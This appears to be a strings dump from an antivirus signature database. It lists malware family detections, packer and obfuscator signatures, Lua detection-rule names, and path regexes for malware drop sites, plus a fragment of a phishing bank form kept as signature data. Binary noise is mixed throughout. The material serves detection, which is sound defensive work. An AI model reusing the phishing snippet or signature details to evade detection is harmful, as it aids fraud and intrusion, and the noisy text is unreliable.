47b3cb4ddfa4 \\winrshost.exe \\bcryptprimitives.dll 5fb3467db8fa \\system32\\taskeng.exe !#ALFPER:ContextEXEonCDDrive ^\\device\\cdrom[0-9][0-9]?$ CONTEXT_DATA_FILE_ATTRIBUTES 55b317e5eb79 pcpitstopscheduleservice.exe !#chromecrxpackage [ChromeCrxPackage] !#LUA:TxtMzHexToBin !#LUA:TxtMzHexToBinIncludesConversionToBinary_fastHex2BinObMpAttributes 4d5a9000 \t4d5a9000 ([0-9A-Fa-f][0-9A-Fa-f]) [txtmzhextobin] !#Lua:StartupLinks.A !#Lua:StartupLinks.AObMpAttributesxx \\microsoft\\windows\\start menu\\programs\\startup.*%.lnk 6\\microsoft\\windows\\start menu\\programs\\startup.*%.lnk !#SLF:Ransom:Win32/Tibbar.B!rsm cscc.dat \tcscc.dat infpub.dat 147b3925bbe5d (%l:\\.+%.class) 9b278d8fa2e1d 9b278d8fa2e1dFlags1 exprtRva \texprtRva imprtSize contains_rva 3dd0ea07e330 3dd0ea07e330IncludesResearchData \">To protect access to your account, you will need to provide your Discover Bank Account Number, a\">To protect access to your account, you will need to provide your Discover Bank Account Number, <form name=\"regForm1\" id=\"regForm1\" method=\"post\" action=\"http:// B<form name=\"regForm1\" id=\"regForm1\" method=\"post\" action=\"http:// .php\" autocomplete=\"on\"> 2db33f89389f ]8u]U SuspFileDroppedBySystemProcess !#ALF:ContextualDropADSExecEntity %w+[:]%w+%.%w+$ 5e950ad7e5de sigoffset e1b3b23fb4c6 e1b3b23fb4c6IncludesBMLuaLib \\\\amd.com\\ 1fa789c5f8bd7 2597866158d45 19b334fce997 \\mailstorehome.exe \\mailstoreclient.exe 1b278df76e014 3e788932033b au3_opcode_ptr 1d295a3c4423 1d295a3c4423IncludesResearchData [Base64Decode] //SCPT:Base64.Decoded !#Lua:Kovter.A \\local settings\\application data\\kb $\\local settings\\application data\\kb \\appdata\\local\\kb Lua:Kovter.A !#Lua:Adware:Adposhel (.+\\)(.+)\\$ %x%x%x%x%x%x%x%x.dll %x%x%x%x%x%x%x%x LUA:Adposhell:Name !#SLF:Lua:ScriptAttachment.A !#SLF:Lua:ScriptAttachment.AIncludesResearchDataObMpAttributes Lua:FileInOutlookCache.A Lua:FileInWindowsMailApp.A 2db39577e424 %localappdata%\\microsoft\\windows\\ \"%localappdata%\\microsoft\\windows\\ %system%\\ %system%\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\ ?%system%\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\ 5cb387ddca62 !#ALF:ExcelDownloader!ibt !#ALF:ExcelDownloader!ibtObMpAttributes .xlsb-> %.xlsb%->.+ >xl/macrosheets/ 417813caa507 417813caa507Flags1 Obfuscator_LowFi !#GateKeeper.A !#GateKeeper.AObMpAttributes GetOsVersion GetOsBuildNumber IsSampled !#Lua:WebsiteFileHasIOAVURL !#Lua:WebsiteFileHasIOAVURLObMpAttributes .website \t.website Lua:WebsiteFileHasIOAVURL Lua:WebsiteChildFileHasIOAVURL .appref-ms Lua:ApprefFileHasIOAVURL Lua:ApprefChildFileHasIOAVURL !#Lua:SuspiciousJenxcusFilename ^%a%a%a%a%a%a%a%a%a%a%.%.vbs$ ^%a%a%a%a%a%a%a%a%a%a%.%.vbe$ !#Lua:DorkbotDropper.A cleaner.exe Lua:DorkbotDropper.A !#Lua:ContextualBrowserDownload.A firefox.exe microsoftedge.exe browser_broker.exe antimalware.tools.testhips.exe !#PEPCODE:TrojanDownloader:Win32/Renos.gen!AR !#AvTempFile !#AvTempFileObMpAttributes !PECompact_1_56 !#MPTEST-AGG-02 !#ExeCryptor_LZ !RarDefault_371 !RarDefault_300 !RarDefault_390 !Pecompact_0978 !Pecompact_0978 KT !ASPack2k_2001b !MoleBox_2_3640 !PESentry_0_05a !PESentry_0_05a _ !RarDefault_260 !RarDefault_260 _ !RarDefault_270 !RarDefault_270 _ !RarDefault_271 !RarDefault_280 !RarDefault_290 !RarDefault_340 !RarDefault_342 !RarDefault_341 !RarDefault_330 !RarDefault_311 !RarDefault_310 !RarDefault_320 !RarDefault_3xx !#MPTEST-AGG-00 !RarDefault_3xx ! !SfxCab_3bbdda3b ! !Pecompact_09753 ! !Pecompact_09761 ! !RarWinCon_390b1 ! !RarWinCon_390b1 !V !SfxCab_556fcda4 ! !SfxCab_556fcda4 !V !SfxCab_b1302d4c ! !SfxCab_d53d2e4f ! !SfxCab_d53d2e4f !D !SfxCab_bb7f3874 ! !SfxCab_bb7f3874 !+6 !JDProtect_0_90B ! !SfxCab_8ead0856 ! !SfxCab_8ead0856 !o= !PECompact_1_30+ ! !SfxCab_7a5100d5 ! !SfxCab_7a5100d5 !q !#do_deep_rescan ! !#do_deep_rescan !U !RarDefault_370p ! !RarDefault_370p !U !RarDefault_37b1 ! !RarDefault_37b1 !U !RarDefault_37b3 ! !PECompact_1_60+ ! !PECompact_1_66+ ! !SimplePack_1_11 ! !SfxCab_f8e1559a ! !AverCryptor_1_0 ! !SfxCab_3042dbd6 ! !SfxCab_c7f925e5 ! !SfxCab_29ef55d8 ! !SfxCab_29ef55d8 !x !SfxCab_9401eb59 ! !SfxCab_cecf004d ! !SfxCab_ab7ba1b2 ! !SfxCab_bec89f1c ! !RarDefault_371p ! !ExeStealth_2_74 ! !ExeStealth_2_70 ! !ExeStealth_2_70 !o X~S $ !PEBundle_2_01b1 ! !EPLCmp_9b4c6182 ! !EPLCmp_354cbad6 ! !RarDefault_342p ! !RarDefault_350p ! !RarDefault_341p ! !RarDefault_3xxp ! !RarDefault_360p ! !RarDefault_330p ! !RarDefault_340p ! !RarDefault_320p ! !ExeStealth_2_72 ! !Pecompact_09781 \" $:? !RarDefault_380b4 \" !RarDefault_380b4 \"8 !Nuwar_largealloc \" !RarDefault_340b2 \" !RarDefault_340b2 \"*, !AverCryptor_1_02 \" !RarDefault_380b3 \" Eljd\" !RarDefault_390b1 \" !RarDefault_390b2 \" !RarDefault_360az \" !AlexProtector_1x \" !AlexProtector_1x \"s !Vundo_largealloc \" !RarDefault_380b1 \" !RarDefault_380b1 \"_ !RarDefault_270b2 \" !CabSfxW_4a1ba5bd # !CabSfxW_4a1ba5bd #U AfbyM !RarDefault_37b1_a # !RarDefault_37b1_a #U !RarDefault_37b4_a # !RarDefault_37b4_a #U !RarDefault_37b2_k # !RarDefault_37b2_k #U !RarDefault_37b4_a #x !RarDefault_340b2p # !nBinder_5_limited # !nBinder_5_limited #> !PEBundle_2_42_mem # !PECompact_1_40b2+ # !PECompact_1_40b2+ #o !PEBundle_2_40_mem $ !PEBundle_2_40_mem $# !#FOP:Deep_Analysis $ !#PEEMU:mpeattrtest $ C8-$9 !#PEEMU:mpeattrtest $C8-$9 !RarDefault_07_2008 $ !RarDefault_07_2008 $f -8{S+ @ !YodaProtector_1_03 $ !YodaProtector_1_03 $> !PEBundle_2_40_disk $ !Alureon_largealloc $ !Alureon_largealloc $\" !#FOP:Deep_Analysis $o !PEBundle_2_42_disk $ !PEBundle_2_42_disk $]bZ !#ExeCryptor_JCALG1 $ !#ExeCryptor_JCALG1 $( !UltraProtect_0_4_b $ !UltraProtect_0_4_b $p !#LowFiSimdaAntiEmu % !nBinder_5_5_limited % !#Virus:Win32/Anah.A % !ST_Protector_1_5_SE % !RarDefault_350b2brp & !#PEEMU:Deep_Analysis & !#PEEMU:Deep_Analysis &b- !#PEEMU:Deep_Analysis &u+\\8 !#Pameseg_SEH_decrypt & !#PEEMU:Deep_Analysis &ao 6F!jE !#PEEMU:Deep_Analysis &6F!jE 6F!jo !#PEEMU:Deep_Analysis &6F!jo !#PEEMU:Deep_Analysis &2 !#PEEMU:Deep_Analysis &N !#PEEMU:Deep_Analysis &- !#PEEMU:Deep_Analysis &[ !#PEEMU:Obfuscator.ES & !#PEEMU:Deep_Analysis &y<T !#SampleOnlyAttribute & !#PEEMU:Deep_Analysis &9& diPZ@ !#Win32/AutoIt_PEEMU1 & !#PEEMU:Deep_Analysis ' !#PEEMU:Deep_Analysis 'Y !nBinder_5_5_1_limited ' !nBinder_5_5_1_limited '^X !#PEEMU:Themida_Packer ' !#PEEMU:Themida_Packer 'k! !#Adware:Win32/Gabpath ' !#SIGATTR:mzinresource ( !#SIGATTR:mzinresource (:p !NTKRNL_Metmorphism_V01 ( !#PEEMU:Packer.ObfInWin ( !#PEEMU:Packer.ObfInWin (i !#PEEMU:Packer.ObfInWin (@c !#PEEMU:Packer.ObfInWin (G !#PEEMU:Packer.ObfInWin (w !#PEEMU:Packer.ObfInWin (+ !#PEEMU:MpPersistTest.A ( !#PEEMU:MpPersistTest.A (d !#PEEMU:Packer.ObfInWin ) !#PEEMU:Disable_APILimit ) !#PEEMU:Disable_APILimit )/J !#PEEMU:mov_ecx_ecx_junk ) !#PEEMU:mov_ecx_ecx_junk )E !#PEEMU:mov_esi_esi_junk ) !#PEEMU:Win32/Upatre_msg ) !#PEEMU:Disable_APILimit )2- > fqe !#PEEMU:ObfuscatorBerrof ) !#PEEMU:ObfuscatorBerrof ); !#PEEMU:mov_eax_eax_junk ) !#PEEMU:mov_edi_edi_junk * !#VirTool:Win32/CeeInject * !#VirTool:Win32/CeeInject *m|e !#PEEMU:ObfuscatorSelfdel * !#PEEMU:ObfuscatorSelfdel *KN !#VirTool:Win32/CeeInject *yl !#PEEMU:GamarueObfuscator * !#PEEMU:GamarueObfuscator *U\\ !#VirTool:Win32/CeeInject *V !#PEEMU:Disable_SEH_Limit + !#PEEMU:Disable_SEH_Limit +V\\ V1Ya@ !#PEEMU:Obfuscator_JR_Main + !#PEEMU:Worm:Win32/Agent.A + !#PEEMU:Worm:Win32/Agent.A +e !#PEEMU:Obfuscator_JR_Flip + !#PEEMU:Obfuscator_JR_Flip +<V !#PEEMU:Obfuscator_JR_Main +<V !#PEEMU:Obfuscator_JR_Main +;HR !#attrmatch_delfinjectrsrc + !#attrmatch_delfinjectrsrc +? !#attrmatch_delfinjectrsrc +S| !#attrmatch_delfinjectrsrc - !#Virus:Win32/Sality.gen!enc - !#PEEMU:PWS:Win32/Ldpinch.BE - /Sb[ /Sb[ !#PEEMU:Virus:Win32/Golem.G5 - !#Virus:Win32/Sality.gen!enc -3 !#Virus:Win32/Sality.gen!enc . !#Virus:Win32/Sality.gen!enc .g !#PEEMU:Worm:Win32/Colowned.A . b8\\m@ !#ALF:Trojan:Win32/Memcat!dha . !#ALF:Trojan:Win32/Memcat!dha .S%2 !#PEEMU:Virus:Win32/Expiro.CI / @h LuK !#PEEMU:Virus:Win32/Expiro.CI /@h LuK !#FOPEX:Deep_Analysis_VMM_Grow / !#FOPEX:Deep_Analysis_VMM_Grow /VK- !#PEEMU:Trojan:Win64/Viknok!EP / !#PEEMU:Trojan:Win64/Viknok!EP /z !#FOPEX:Deep_Analysis_VMM_Grow 0 !#PEEMU:Trojan:Win32/Sefnit.K.2 0 !#PEEMU:VirTool:Win32/CeeInject 0 !#PEEMU:deep_analysis_quervar_c 0 !#PEEMU:Trojan:Win32/Sefnit.K.1 1 !#PEEMU:Trojan:Win32/Sefnit.K.1 1Lf_ !#PEEMU:Obfuscator_JR_Main_Type2 1 @ !#PEEMU:Obfuscator_JR_Main_Type2 1j !#PEEMU:Obfuscator_JR_Main_Type3 1 @ !#PEEMU:Obfuscator_JR_Main_Type3 1o> 3T@ !#PEEMU:Obfuscator_JR_Main_Type2 1 @ !#PEEMU:Obfuscator_JR_Main_Type2 1' !#PEEMU:Obfuscator_JR_Main_Type2 2 @ !#PEEMU:Obfuscator_JR_Main_Type2 2 !!#PEEMU:Trojan:Win32/Tibs.gen!J.2 2 !!#PEEMU:Trojan:Win32/Tibs.gen!J.1 3 \"!#LoD:VirTool:Win32/Obfuscator.ACW 3 1@\"!#LoD:VirTool:Win32/Obfuscator.ACW 3 \"!#Quervar_Packer_LoadLibrary_Trick 3 H1\"!#Quervar_Packer_LoadLibrary_Trick 3 \"!#LoD:VirTool:Win32/Obfuscator.ACW 3-obK @\"!#LoD:VirTool:Win32/Obfuscator.ACW 3=a \"!#LoD:VirTool:Win32/Obfuscator.ACW 3R @\"!#LoD:VirTool:Win32/Obfuscator.ACW 38{ KM@\"!#LoD:VirTool:Win32/Obfuscator.ACW 3 @\"!#LoD:VirTool:Win32/Obfuscator.ACW 3@ \"!#TELPER:Possible_Obf_Platinum!dha 4 @\"!#TELPER:Possible_Obf_Platinum!dha 4 #!#PEEMU:Backdoor:Win32/Poison.L!dam 4 #!#PEEMU:VirTool:Win32/Obfuscator.AU 5 /I#!#PEEMU:VirTool:Win32/Obfuscator.AU 5 $!#PEEMU:VirTool:Win32/Obfuscator.AKK 5 $!#PEEMU:VirTool:Win32/Obfuscator.AKK 5 $!#LoD:VirTool:Win32/Obfuscator.ACV.2 5 g>\"4g>\"4 $!#LoD:VirTool:Win32/Obfuscator.ACV.2 5g>\"4g>\"4 $!#LoD:VirTool:Win32/Obfuscator.ACV.2 5b $!#PEEMU:VirTool:Win32/Obfuscator.ALL 5 $!#PEEMU:VirTool:Win32/Obfuscator.ALL 5u $!#LoD:VirTool:Win32/Obfuscator.ACV.2 5k[ $!#LoD:VirTool:Win32/Obfuscator.ACV.2 53>z $!#LoD:VirTool:Win32/Obfuscator.ACV.2 5/^< $!#PEEMU:VirTool:Win32/Obfuscator.AKH 5 @$!#PEEMU:VirTool:Win32/Obfuscator.AKH 5 $!#LoD:VirTool:Win32/Obfuscator.ACV.2 5Cf $!#LoD:VirTool:Win32/Obfuscator.ACV.2 5Q $!#LoD:VirTool:Win32/Obfuscator.ACV.2 5\\ $!#LoD:VirTool:Win32/Obfuscator.ACV.2 6 $!#LoD:VirTool:Win32/Obfuscator.ACV.2 6o %!#attrmatch_codepatch_EIP_00000003_eb 6 E<@%!#attrmatch_codepatch_EIP_00000003_eb 6 %!#attrmatch_codepatch_EIP_0000000C_74 6 %!#attrmatch_codepatch_EIP_0000000C_74 6M/ %!#attrmatch_codepatch_EIP_00000051_00 6 W%!#attrmatch_codepatch_EIP_00000051_00 6 %!#attrmatch_codepatch_EIP_00000002_eb 6 T@%!#attrmatch_codepatch_EIP_00000002_eb 6 %!#attrmatch_codepatch_EIP_00000049_72 6 %!#attrmatch_codepatch_EIP_0000002A_EB 6 .%!#attrmatch_codepatch_EIP_0000002A_EB 6 %!#attrmatch_codepatch_EIP_00000019_EB 6 @%!#attrmatch_codepatch_EIP_00000019_EB 6C %!#attrmatch_codepatch_EIP_0000001f_eb 6 %!#attrmatch_codepatch_EIP_00000012_EB 6 %!#attrmatch_codepatch_EIP_00000017_EB 6 @%!#attrmatch_codepatch_EIP_00000017_EB 6o %!#attrmatch_codepatch_EIP_0000004D_75 6 %!#attrmatch_codepatch_EIP_0000007C_73 6 %!#attrmatch_codepatch_EIP_0000007C_73 6^8+5 %!#attrmatch_codepatch_EIP_0000004B_82 6 %!#attrmatch_codepatch_EIP_0000004B_82 6= %!#attrmatch_codepatch_EIP_0000000D_EB 6 Z%!#attrmatch_codepatch_EIP_0000000D_EB 6 %!#attrmatch_codepatch_EIP_00000000_C3 6 %!#attrmatch_codepatch_EIP_00000000_C3 6{ %!#attrmatch_codepatch_EIP_00000005_EB 6 q %!#attrmatch_codepatch_EIP_0000002E_82 6 @K2A %!#attrmatch_codepatch_EIP_0000002E_82 6@K2A %!#attrmatch_codepatch_EIP_00000038_5A 6 %!#attrmatch_codepatch_EIP_00000047_74 6 %!#attrmatch_codepatch_EIP_00000009_EB 6 I]!&%!#attrmatch_codepatch_EIP_00000009_EB 6 %!#attrmatch_codepatch_EIP_00000006_00 6 @%!#attrmatch_codepatch_EIP_00000006_00 6 %!#attrmatch_codepatch_EIP_00000023_7D 6 g@%!#attrmatch_codepatch_EIP_00000023_7D 6 %!#attrmatch_codepatch_EIP_00000017_8E 6 @%!#attrmatch_codepatch_EIP_00000017_8E 6a %!#attrmatch_codepatch_EIP_000000BD_72 6 %!#attrmatch_codepatch_EIP_000000BD_72 6* %!#attrmatch_codepatch_EIP_00000008_84 6 @%!#attrmatch_codepatch_EIP_00000008_84 6I %!#attrmatch_codepatch_EIP_00000036_eb 6 @%!#attrmatch_codepatch_EIP_00000036_eb 6 %!#attrmatch_codepatch_EIP_0000000A_7E 6 ,%!#attrmatch_codepatch_EIP_0000000A_7E 6 %!#attrmatch_codepatch_EIP_0000000E_7E 6 .W@%!#attrmatch_codepatch_EIP_0000000E_7E 6/ %!#attrmatch_codepatch_EIP_00000025_EB 6 %!#attrmatch_codepatch_EIP_00000025_EB 6F %!#attrmatch_codepatch_EIP_00000019_7E 6 %!#attrmatch_codepatch_EIP_00000019_7E 6* *z@%!#attrmatch_codepatch_EIP_00000017_EB 6 %!#attrmatch_codepatch_EIP_00000000_C3 6^[ %!#attrmatch_codepatch_EIP_000000CF_84 6 %!#attrmatch_codepatch_EIP_000000CF_84 6d )@%!#attrmatch_codepatch_EIP_00000006_00 6} %!#attrmatch_codepatch_eip_00000044_90 6 @%!#attrmatch_codepatch_eip_00000044_90 6 %!#attrmatch_codepatch_EIP_0000003A_72 6 %!#attrmatch_codepatch_EIP_0000003A_72 6M r]@%!#attrmatch_codepatch_EIP_00000002_eb 6 %!#attrmatch_codepatch_EIP_0000002F_EB 6 <[%!#attrmatch_codepatch_EIP_0000002F_EB 6 %!#attrmatch_codepatch_EIP_00000006_EB 6 %!#attrmatch_codepatch_EIP_00000006_EB 6, %!#attrmatch_codepatch_EIP_00000028_EB 6 T@%!#attrmatch_codepatch_EIP_00000028_EB 6 %!#attrmatch_codepatch_EIP_00000041_90 6 %!#attrmatch_codepatch_EIP_00000041_90 6Sj %!#attrmatch_codepatch_EIP_0000001A_EB 6 @%!#attrmatch_codepatch_EIP_0000001A_EB 6 %!#attrmatch_codepatch_EIP_00000010_EB 6 @%!#attrmatch_codepatch_EIP_00000010_EB 6p %!#attrmatch_codepatch_EIP_0000002E_00 6 ;@%!#attrmatch_codepatch_EIP_0000002E_00 6$ %!#attrmatch_codepatch_EIP_0000001E_EB 6 @%!#attrmatch_codepatch_EIP_0000001E_EB 6$ %%!#attrmatch_codepatch_EIP_0000001E_EB 6w %!#attrmatch_codepatch_EIP_0000006A_75 6 %!#attrmatch_codepatch_EIP_0000005C_74 6 %!#attrmatch_codepatch_EIP_0000001B_83 6 %!#attrmatch_codepatch_eip_00000008_EB 6 @%!#attrmatch_codepatch_eip_00000008_EB 6z& X@%!#attrmatch_codepatch_EIP_00000017_EB 6 \\%!#attrmatch_codepatch_EIP_00000000_C3 6 %!#attrmatch_codepatch_EIP_0000000C_EB 6 5*%!#attrmatch_codepatch_EIP_0000000C_EB 6~|9 .@%!#attrmatch_codepatch_EIP_00000025_EB 6 %!#attrmatch_codepatch_EIP_0000000D_00 6 %!#attrmatch_codepatch_EIP_00000036_73 6 %!#attrmatch_codepatch_EIP_0000001B_74 6 %!#attrmatch_codepatch_EIP_0000001B_74 6G > %!#attrmatch_codepatch_EIP_0000001A_85 6 %!#attrmatch_codepatch_EIP_0000001B_EB 6 @%!#attrmatch_codepatch_EIP_0000001B_EB 6<K %!#attrmatch_codepatch_EIP_00000092_7D 6 %!#attrmatch_codepatch_EIP_00000092_7D 6- %!#attrmatch_codepatch_EIP_0000002f_8d 6 %!#attrmatch_codepatch_EIP_0000002f_8d 6S %!#attrmatch_codepatch_EIP_00000024_EB 6 @%!#attrmatch_codepatch_EIP_00000024_EB 6 *%!#attrmatch_codepatch_EIP_0000000C_EB 6 %!#attrmatch_codepatch_EIP_00000006_92 6 %!#attrmatch_codepatch_EIP_00000006_92 6m @%!#attrmatch_codepatch_EIP_00000019_EB 6 %!#attrmatch_codepatch_EIP_0000002C_74 6 %!#attrmatch_codepatch_EIP_00000011_7E 6 @%!#attrmatch_codepatch_EIP_00000011_7E 6 %!#attrmatch_codepatch_EIP_0000006F_82 6 %!#attrmatch_codepatch_EIP_00000098_74 6 %!#attrmatch_codepatch_EIP_00000098_74 6` %!#attrmatch_codepatch_EIP_0000003A_00 6 @%!#attrmatch_codepatch_EIP_0000003A_00 6=\\ %!#attrmatch_codepatch_EIP_00000022_eb 6 %!#attrmatch_codepatch_EIP_00000022_eb 6^ %!#attrmatch_codepatch_EIP_0000005C_73 6 %!#attrmatch_codepatch_EIP_0000005C_73 6DyK %!#attrmatch_codepatch_EIP_0000001D_EB 6 6d@%!#attrmatch_codepatch_EIP_0000001D_EB 6 %!#attrmatch_codepatch_EIP_00000010_7E 6 @%!#attrmatch_codepatch_EIP_00000010_7E 6a#K %!#attrmatch_cod isFirstTimeATActive getFTATData FirstTime set_detection_string !#Lua:JSEMU_WscriptCscriptContext [^\\]+$ ^%l+%.js \t^%l+%.js IsWscriptCopyMadeByBondat \\appdata\\roaming\\%l+\\%l+[63]?[42]?%.exe$ )\\appdata\\roaming\\%l+\\%l+[63]?[42]?%.exe$ \\appdata\\roaming\\%l+$ \\%.trashes\\%d+$ Lua:BondatContextualWscriptRunWithPath_GenFirst 0Lua:BondatContextualWscriptRunWithPath_GenFirst winprocess.exe winupdate32.exe winhost32.exe msupdate.exe winupdate.exe mshost.exe Lua:BondatContextualWscriptRun intel monitor update 64.exe 32.exe !#Lua:AccessibilityEscalationContext.B !#Lua:AccessibilityEscalationContext.BObMpAttributes sethc utilman2.exe utilman screenmagnifier.exe magnifier sr.exe narrator \tnarrator displayswitch \\\\%?\\ Lua:AccessibilityEscalationContext.B!noversioninfo 3Lua:AccessibilityEscalationContext.B!noversioninfo microsoft corporation Lua:AccessibilityEscalationContext.B!mimick ,Lua:AccessibilityEscalationContext.B!mimick Lua:AccessibilityEscalationContext.B!originalfname_nomatch ;Lua:AccessibilityEscalationContext.B!originalfname_nomatch Lua:AccessibilityEscalationContext.B!internalname_nomatch :Lua:AccessibilityEscalationContext.B!internalname_nomatch Lua:AccessibilityEscalationContext.B!company_nomatch 5Lua:AccessibilityEscalationContext.B!company_nomatch Lua:AccessibilityEscalationContext.B!friendly .Lua:AccessibilityEscalationContext.B!friendly Lua:AccessibilityEscalationContext.B!unfriendly 0Lua:AccessibilityEscalationContext.B!unfriendly !#ALF:Lua:ExeHugeOverlay Lua:ExeGamObfusHugeOverlay 10a418b6dffd8 10a418b6dffd8IncludesBMLuaLib [%w%-%.]*%.[%w%-]+%.[%w]+ NRI-DNS-TL-NTXT %s_%s_%s \t%s_%s_%s DNS-sinkhole !#Lua:SingleFileInACE Lua:SingleFileInACE Lua:SingleFileInACE!ufs Lua:SingleZipInACE Lua:SingleVBSInACE Lua:SingleLNKInACE Lua:SingleWSFInACE Lua:SingleVBEInACE Lua:SingleJSEInACE Lua:SingleHTAInACE Lua:SingleEXEInACE Lua:SingleDLLInACE Lua:SingleCOMInACE Lua:SinglePSInACE Lua:SingleBATInACE Lua:SingleRarInACE Lua:SingleACEInACE Lua:SingleJSInACE Lua:Single7zInACE Foxiebro FoxiebroIncludesGenericRepairHelpers BrowserModifier:Win32/Foxiebro *.dll %a:\\program files\\[%a%s]+\\uninstaller.exe *%a:\\program files\\[%a%s]+\\uninstaller.exe %a:\\programdata\\%x%x%x%x%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%x%x%x%x%x%x%x%x\\ Z%a:\\programdata\\%x%x%x%x%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%x%x%x%x%x%x%x%x\\ %a:\\program files.*\\common files\\%x%x%x%x%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%x%x%x%x%x%x%x%x\\ k%a:\\program files.*\\common files\\%x%x%x%x%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%-%x%x%x%x%x%x%x%x%x%x%x%x\\ !#Lua:OLE.Shellcode.Custom !#Lua:OLE.Shellcode.CustomObMpAttributes [Ee][Qq][Uu][Aa][Tt][Ii][Oo][Nn].3 #[Ee][Qq][Uu][Aa][Tt][Ii][Oo][Nn].3 SCRIPT:OLE.EquationCLSID SCPT:OLE.Equation3.A ->xl/embeddings/oleObject Lua:OLE.ShellcodeInSuspiciousFile \"Lua:OLE.ShellcodeInSuspiciousFile !#FOP:zbot_deep_analysisQ !#FOP:zbot_deep_analysis !#lua_codepatch_loktrom_b CHuJuX[Y !#FOP:Trojan:Win32/Waledacd !#ALFPER:Trojan:Win32/EmotetP11 \t!#ALFPER:Trojan:Win32/EmotetP11 !#FOP:Trojan:Win32/Vundo.JD.dllU+u !XTEA_A_1` !KKrunchy_0_23a !#FOP:Vapsup_Cmp !#FOP:Deep_Analysis !#FOP:Zbot_Packer_AU 3Uhdd !#do_vmmgrow_rescan) !#do_vmmgrow_rescan)GF1! !#FOP:Win32/Nivdort.09U !#FOP:Win32/Nivdort.15^_ !#FOP:Win32/Nivdort.29 !#FOP:Win32/Nivdort.31 !#ALFPER:Trojan:Win32/Emotet1 !#ALFPER:Trojan:Win32/Emotet1) !#FOP:Win32/Obfuscator.PushRet.Ah !#FOP:VirTool:Win32/Obfuscator.CI1Phh !#FOP:VirTool:Win32/Obfuscator.CI1Ph !#FOP:VirTool:Win32/Obfuscator.CI1Qh !#FOP:VirTool:Win32/Obfuscator.CI1Rh !#FOP:VirTool:Win32/Obfuscator.CI1hhh !#FOP:VirTool:Win32/Obfuscator.CI1 !Unkpak !Unkpak !Aspack_v21Stub0 !#FOP:Zbot_Packer_A !#FOP:Packer.ObfInWin !#do_exhaustivehstr_rescanU !#zbot_obfuscator_codepatch !#FOP:VirTool:Win32/Obfuscator.CI2` !#FOP:VirTool:Win32/Obfuscator.CI2 !ldpinchPQRSjjj3V3V !ldpinchPQRSjjj3V3V PQRSj3Wj3V !Petite_v12f` !Wwpack_1_1 !#FOP:Win32/Nuwar3^ !#FOP:Miuref_Decrypt !#FOP:Hupigon.NakedPack` !#FOP:PWS:Win32/Zbot.BW ^ahhhhh !#FOP:Trojan:Win32/Waledac+ !PolyEnEP !!PolyEnEP RP;ZZ !kkrunchy -\t !kkrunchy !shoooo_1Ju -\t !shoooo_1Ju !#_SVKP111` ^UQjV !PELock_1_06 !Unpack:unas !#FOP:EyeStye !VGShrink_071 WVWUWV !#FOP:Win32/Nuwar !#FOP:Win32/Vxidl !Aspack_v212Stub0] !SoftwareCompress !#FOP:Deep_AnalysisU !#FOP:Win32/C2Lop.D !AmoebaDelphiLoaderh !NSPack_UnsupportedU3V !SimpleCrypterOnTopOfMew !#FOP:Keatep_deep_analysisW !#ALFPER:Trojan:Win32/Emotet !#FOP:Win32/Tibs_obfuscator_01 !#FOP:Worm:Win32/Conficker.B.1 !#VirTool:Win32/Obfuscator.AAW !#FOP:Backdoor:Win32/Bifrose.FUU !CeeInject . !CeeInject SUVWhjh !Thinstalljhjjjh . !Thinstalljhjjjh !gamevanceU . !gamevanceU !PEncrypt_2_0`S !#FOP:FakeSpypro !SomeEpRedirectorU jhhdPd SVWXXX XgXXXX !Aspack_v211cStub0 !#FOP:Deep_Analysis) 33Kf+ 3Cf+!2 33=u3 !RLPack_1_16f_damaged` !#FOP:zbot_deep_analysis\t[ !#Trojan:Win32/Emotet.Q!1 !#FOP:Trojan:Win32/WaledacU !#FOP:Worm:Win32/Spybot.CE kVWSj !#FOP:FakeXPA_deep_analysis !#FOP:Ogimant!Obfuscator!Acv!EpU !#ALF:FOP:VirTool:Win32/VBInject.AEEff !shoooo_2U /\t\"!shoooo_2U !!Upack_039X !!Upack_039X !Petite_v13 !Petite_v13 !Petite_v14 !Petite_v14 !RarZip_390U !RarZip_390U W3SSh !WinZipSfx1U !WinZipSfx1U VWh3V !beria_0_07 !beria_0_07 UVWh3U !#do_vmmgrow_rescanI !#MpEplEntryPointCodeU !#FOP:Win32/Rustock.dr` !#FOP:Trojan:Win32/Tibs.A jhWjj !#zbot_obfuscator_codepatch1jhjjhjj jhjjhjj !#FOP:Trojan:Win32/Vundo.HV1` @@@@@@@@@@@@@ !eXPressory 0 \"!eXPressory !#FOP:Ursnif3hP !#FOP:Ursnif3hP jjP@PQ !MPRESS_LZMA` !MPRESS_LZMA` !PolycryptPE_1x2x !#FOP:KovterCallSledhh !#FOP:KovterCallSledjj !#FOP:KovterCallSledj !#FOP:KovterCallSled !RLPack_full_edition`jhhj !RLPack_full_edition !#FOP:Win32/Obfuscator3^ !#FOP:BatToExeConverter u+QVP !#FOP:Simda_Deep_Analysis !#FOP:Trojan:Win32/Srizbi.Bh !#FOP:TrojanDropper:Win32/Small.RZ% 0\" !#FOP:TrojanDownloader:Win32/Cutwail.AG !#FOP:EyeStyeU 1 !#FOP:EyeStyeU !#FOP:Miuref_DecryptU !#FOP:Bifrose.Themida !#zbot_obfuscator_codepatch1jhhjhj jhhjhj !#FOP:Injector_generic_attibute t_^2] !HmimysU '!HmimysU !#FOP:VMM_GrowS !#FOP:VMM_GrowS tVWhjS !#FOP:VMM_GrowU !#FOP:VMM_GrowU Sjhh3S VWhSP !#virut_type_A] !#virut_type_A] !LameCrypt_1_0`f !LameCrypt_1_0`f !obfuscator.ft3Jj !obfuscator.ft3Jj !shoooo_1_LZMA !shoooo_1_LZMA !shoooo_2_LZMA !shoooo_2_LZMA !YodaProtector.1_02 !#zbot_obfuscator_codepatch1jjj !#zbot_obfuscator_codepatch1j !#FOP:VirTool:Win32/DelfInject.AX 2! !PEncrypt_2_0 3 \"!PEncrypt_2_0 !#_SVKP132_143` !!#_SVKP132_143` !#FOP:GamevanceU !#FOP:GamevanceU !#FOP:JunkMovAl !#FOP:JunkMovAl !#FOP:aplib_x64=s !#FOP:aplib_x64=s !ArmProtector03] !ArmProtector03] !PECompact2_DBG !PECompact2_DBG USQWVR !Petite_v21L1_9 !Petite_v21L1_9 hddf`P3 !Petite_v22L1_9 !Petite_v22L1_9 hddf`Ph PVjhWjjVjhW 